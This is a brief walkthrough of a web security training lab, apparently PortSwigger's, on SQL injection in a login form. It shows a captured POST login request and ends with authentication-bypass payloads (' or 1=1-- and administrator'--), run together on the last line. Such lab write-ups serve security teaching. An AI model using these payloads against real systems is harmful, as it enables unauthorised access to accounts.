This lab contains a SQL injection vulnerability in the login function.
To solve the lab, perform a SQL injection attack that logs in to the application as theadministratoruser.
Click on «My account»:
We can see that the request is sent by POST.
The value we add to the username field will be included in the request.
We’ll use this field directly in the browser to add the payload.
POST /login HTTP/2
Host: 0ad0007504466dfd80b4803b004d00c3.web-security-academy.net
Cookie: session=a7lwL0VbWHPX3RQq1j5pRigFXeVvvMC9
Content-Length: 67
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://0ad0007504466dfd80b4803b004d00c3.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0ad0007504466dfd80b4803b004d00c3.web-security-academy.net/login
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
csrf=HbubKlt7xId4TjkzU3lb8T1oq6ILQs0v&username=admin&password=admin
We can try the usual payloads:
We can also use shorter versions as:
' or 1=1--administrator'--